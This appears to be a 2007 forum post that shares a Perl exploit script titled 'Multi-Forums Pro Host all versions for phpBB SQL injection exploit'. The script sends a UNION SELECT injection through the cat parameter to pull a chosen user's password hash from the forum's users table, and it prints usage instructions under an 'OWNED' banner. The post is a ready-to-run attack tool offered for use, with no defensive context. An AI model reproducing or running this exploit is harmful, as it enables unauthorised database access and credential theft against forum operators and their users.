Gonzalez Posted June 28, 2007 Report Posted June 28, 2007 #!/bin/perl use LWP::UserAgent; use HTTP::Cookies; if(@ARGV < 3) { ause(); exit();} $h=$ARGV[0]; $u=$ARGV[2]; $f=$ARGV[1]; $www = new LWP::UserAgent; $xpl="$h/?cat=-1+union+select+null,user_password,null+from+$f\_users+where+user_id=$u/*"; print "[~] Attacking $h\n"; $res = $www->get($xpl) or err(); $res->content() =~ /([0-9,a-f]{32})/ or err(); print "\n[~] User id:$u \r\n[~] Password hash:$1"; sub ause() { print "\n==[ OWNED ]==\n\n"; print "<-------------------------------------------------------->\n"; print "Multi-Forums Pro Host all versions for phpBB SQL injection exploit\r\n"; print "Ussage: owned.pl <path_to_directory.php> <forum_name> <user_id>\r\n"; print "e.g: owned.pl [url]http://site.com/directory.php[/url] info 2\r\n"; print "<-------------------------------------------------------->\n"; } sub err() {print "$xpl\n[-] Engine is NOT vulnerably"; exit();} Quote
